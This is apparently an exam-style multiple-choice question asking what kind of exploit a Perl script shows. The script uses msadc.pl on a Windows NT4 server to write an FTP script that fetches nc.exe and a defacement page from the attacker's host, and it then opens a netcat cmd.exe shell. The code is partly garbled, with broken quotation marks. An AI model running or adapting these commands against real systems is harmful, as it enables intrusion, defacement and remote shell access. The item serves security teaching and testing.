A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is
effective, the tester finds it tedious to perform extended functions. On further research, the tester come across a perl script that runs the following msadc functions:
system(-perl msadc.pl -h $host -C \-echo open $your >testfile\-);
system(-perl msadc.pl -h $host -C \-echo $user>>testfile\-);
system(-perl msadc.pl -h $host -C \-echo $pass>>testfile\-);
system(-perl msadc.pl -h $host -C \-echo bin>>testfile\-);
system(-perl msadc.pl -h $host
-C \-echo get nc.exe>>testfile\-);
system(-perl msadc.pl -h $host -C \-echo get hacked.html>>testfile\-);
(-perl msadc.pl -h $host -C \-echo quit>>testfile\-);
system(-perl msadc.pl -h $host -C \-ftp \-s\:testfile\-
);
$o=; print -Opening …\n-;
system(-perl msadc.pl -h $host -C \-nc -l -p $port -e cmd.exe\-);
Which exploit is indicated by this script?
A. A buffer overflow exploit
B. A chained exploit
C. A SQL injection exploit
D. A denial
of service exploit